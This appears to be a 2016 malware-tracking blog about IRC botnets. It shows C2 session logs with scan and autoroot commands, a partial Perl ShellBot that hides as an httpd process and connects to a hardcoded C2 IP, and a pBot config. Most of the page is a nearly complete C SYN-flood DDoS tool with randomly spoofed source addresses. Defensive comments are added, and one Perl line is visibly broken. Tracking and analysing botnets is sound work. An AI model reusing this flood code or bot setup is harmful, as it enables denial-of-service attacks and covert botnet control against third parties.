
Monday, November 28, 2016

ragebot - scan1.zapto.org - t0nixx [SKID]


>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC









# TeaMrx Perlbot vS xeQT


# Operator/control settings of the bot. How each value is consumed is not
# visible in this excerpt (the command loop was removed by the blog author).
# presumably the nicks allowed to issue commands -- confirm against the full sample
my @mast3rs = ("Low","Loww");


# presumably the control channel the bot joins -- confirm against the full sample
my @admchan=("#Perli");

# Default IRC server address, used only when $servidor is not already set; the
# first command-line argument replaces it later in the script. Useful as a
# network indicator. The trailing "// his server" is the blog author's
# annotation, not part of the original sample.
$servidor='188.119.151.131' unless $servidor;  // his server 


# presumably the command prefix the bot reacts to -- confirm
my $xeqt = "!x";
# Working directory; the script chdir()s here before forking.
my $homedir = "/tmp";
# Feature switches and tunables. Their effect is not shown in this excerpt;
# NOTE(review): the names suggest shell access, statistics, packet/flood
# functions, an output line limit and delays -- verify before relying on this.
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

# Process-name masquerade pool: one entry is picked at random into $xproc and
# written to $0 further down, so process listings show a web or mail daemon
# instead of a perl script. Detection hint: the displayed name will not match
# the executable the OS reports for that PID (a perl interpreter).
my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

# Pools for the IRC identity; one entry of each is chosen at random below
# (@nickname -> $nick, @xident -> $ircname, @xname -> $realname).
# The runs of dots look like redactions made when the sample was published.
my @nickname = ("TeaMrx","......","xQt");

# NOTE(review): this line is syntactically broken as published (a quote was
# lost with the redaction); it is kept exactly as it appears on the page.
my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
# Candidate IRC server ports; only 6667 is listed, so the "random" choice of
# $porta below always yields 6667 in this configuration.
my @rports = ("6667");

# Pool of client version banners. Each string is wrapped in \001, the CTCP
# delimiter, and imitates a real IRC client (mIRC, xchat, BitchX, irssi, ...).
# One is picked at random into $Mrx below; presumably it is sent as the CTCP
# VERSION reply so the bot resembles a human client -- the sending code is not
# part of this excerpt. These literal strings can serve as content indicators.
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
# (the scanning routine that would consume this list is not in the excerpt)
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
# Per-run identity: each value is drawn at random from the pools defined above,
# so nick, realname, ident, fake process name and version banner can differ
# between runs. Match on the pool contents rather than on a single value.
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
# @rports holds a single entry, so this is always that port.
my $porta = $rports[rand scalar @rports];
# Fake process title, assigned to $0 after the modules are loaded.
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
# Fixed version string of this bot variant; where it is emitted is not visible here.
my $version = 'vSm0d (C) TeaMrx';

# Ignore the usual polite termination signals so the process survives Ctrl-C,
# terminal hang-up and a plain `kill`; SIGKILL cannot be ignored and still
# stops it. Ignoring CHLD means exited child processes are not left as zombies.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
# NOTE(review): 'PS' is not a standard signal name, so this entry likely has no effect.
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
# Start-up sequence: move to the working directory, pick the server, disguise
# the process title and detach from the launching shell.
# $homedir is "/tmp" in this configuration; the return value is not checked.
chdir("$homedir");
# A first command-line argument overrides the built-in server address.
$servidor="$ARGV[0]" if $ARGV[0];
# Overwrite the process title with the randomly chosen fake daemon name.
$0="$xproc"."\0";
# Fork; the parent exits so only the child keeps running in the background.
my $pid=fork;
exit if $pid;
# Reached with an undefined $pid only when fork itself failed.
die "[x] -> Cannot fork into background: $!" unless defined($pid);
# Connection/DCC bookkeeping; how these are used is not visible in this excerpt.
my %irc_servers;
my %DCC;
# NOTE(review): unusual double constructor call, kept exactly as published.
my $dcc_sel = new IO::Select->new();
# Build a nickname: a random entry of @nickname followed by a random integer
# in 0..999. Callers are not visible in this excerpt (presumably used when the
# chosen nick is unavailable -- confirm against the full sample).
sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

needed to delete some shit coz the site gets blacklisted, so part of the bot source is missing here

  }

ahh, found this on his spreading ftp, maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h

/* Size of the on-stack packet buffer used by flood(). */
#define MAX_PACKET_SIZE 4096
/* Constant mixed into the PRNG seed table by init_rand(). */
#define PHI 0x9e3779b9

/* PRNG state shared by init_rand()/rand_cmwc(): lag table Q and carry c. */
static unsigned long int Q[4096], c = 362436;
/* Destination TCP port; assigned outside this excerpt (main is cut off). */
static unsigned int floodport;
/* Rate-control values read by flood(); presumably adjusted by main, which is
 * not fully visible on this page. */
volatile int limiter;
/* Packet counter incremented once per loop iteration in flood(). */
volatile unsigned int pps;
/* Pause, in microseconds (passed to usleep), applied every `limiter` packets. */
volatile unsigned int sleeptime = 100;

/*
 * Seed the PRNG table Q from x.
 * The first three slots are x, x+PHI and x+2*PHI; every later slot is the XOR
 * of two earlier slots, PHI and the index. flood() calls this with
 * time(NULL), so the seed is just the current wall-clock second.
 */
void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
/*
 * Return the next pseudo-random value and store it back into the table.
 * The shape (4096-entry table, multiplier 18782, carry variable) looks like
 * the widely copied "CMWC4096" multiply-with-carry routine. It is not a
 * cryptographic generator; flood() uses it only to vary header fields.
 * Not thread-safe as written: the static index i and the globals Q and c are
 * updated without any locking.
 */
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 /* advance the index, wrapping inside the 4096-entry table */
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 /* the upper part of the product becomes the new carry */
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
/*
 * One's-complement checksum over `count` bytes starting at buf, in the style
 * of the Internet checksum: add 16-bit words, add a trailing odd byte if there
 * is one, fold the carries back into 16 bits and return the complement.
 * Used by this file for the IP header and, via tcpcsum(), the TCP header.
 */
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 /* consume the buffer two bytes at a time */
 while( count > 1 ) { sum += *buf++; count -= 2; }
 /* odd length: add the final single byte */
 if(count > 0) { sum += *(unsigned char *)buf; }
 /* fold any carry above 16 bits back into the low word */
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

/*
 * Compute the value stored in the TCP checksum field.
 * Builds a local pseudo-header (source, destination, zero, protocol, TCP
 * length) from the IP header, copies it together with the TCP header into a
 * heap buffer and runs csum() over that buffer. Only the bare TCP header is
 * covered, which matches the payload-free packets this tool assembles.
 * The malloc() result is not checked, and total_len is assigned but never used.
 */
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 /* scratch buffer: pseudo-header immediately followed by the TCP header */
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

/*
 * Fill in the static part of the IPv4 header.
 * The packet is header-only: total length is the IP header plus the TCP
 * header, with no payload (typically 40 bytes on Linux -- confirm against a
 * capture). The source address written here is a placeholder; flood()
 * replaces it with a random value before each later send, so source addresses
 * seen by the receiver say nothing about the sending host.
 */
void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 /* protocol 6 = TCP */
 iph->protocol = 6;
 /* checksum is filled in by flood() once the addresses are set */
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

/*
 * Fill in the static part of the TCP header: a bare SYN segment.
 * Traits visible here that can help when writing traffic signatures:
 *   - only the SYN flag is set explicitly, and doff = 5 means the segment
 *     carries no TCP options;
 *   - res2 = 3 sets the two-bit res2 field; per the comment at the top of this
 *     file that is the only change from the "ESSYN" script this was copied
 *     from. NOTE(review): on Linux headers these bits appear to be the ones
 *     later assigned to ECE/CWR -- confirm against a capture before relying
 *     on them as a signature.
 * Source port and sequence number set here are overwritten by flood() on
 * every iteration.
 */
void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 /* NOTE(review): htonl() result stored into what is normally a 16-bit field;
  * the value seen on the wire depends on host byte order -- check a capture. */
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

/*
 * Thread entry point: sends header-only TCP SYN packets to one destination in
 * an endless loop. par1 is the destination address as a dotted-quad string;
 * the destination port comes from the global floodport.
 *
 * Notes for defenders, all derived from the code below:
 *   - It opens a raw socket with IP_HDRINCL, which normally requires elevated
 *     privilege (root or CAP_NET_RAW on Linux). Finding this tool running
 *     therefore implies that level of access on the host; withholding
 *     CAP_NET_RAW from service accounts and containers prevents the socket
 *     from opening.
 *   - The IP source address is replaced with PRNG output on every iteration,
 *     so addresses logged by the receiver are spoofed. Source-address
 *     validation at the network edge (BCP 38 / uRPF) stops such packets from
 *     leaving the originating network.
 *   - The function never returns and never closes the socket; it ends only
 *     when the process exits.
 * The send rate is shaped by the globals limiter and sleeptime; pps is
 * incremented per packet and presumably read by main, which is cut off on
 * this page.
 */
void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 /* IP header at the start of the buffer, TCP header right behind it */
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 /* raw TCP socket: fails without the required privilege */
 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 /* IP_HDRINCL: the program supplies the IP header itself, which is what
  * makes the forged source address possible */
 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 /* PRNG seeded from the clock */
 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  /* the return value of sendto() is ignored */
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  /* randomise source address, IP id, sequence number and source port for
   * the next packet, then recompute both checksums */
  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  /* after `limiter` packets, pause for `sleeptime` microseconds */
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     


Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC




// users 
9/tcp  open  irc     Unreal ircd
| irc-info: 
|   server: irc.MoneyZ.gov.GoV
|   version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV 
|   servers: 1
|   chans: 2
|   users: 246
|   lservers: 0
|   lusers: 246

//config
class pBot
{
 var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
 var $users = array();
 function start() {
    while(true)
 {

Saturday, November 12, 2016

Bot - l.lolole.net - IRC

DNS : l.lolole.net


<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb :               M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb :          www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk



test https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034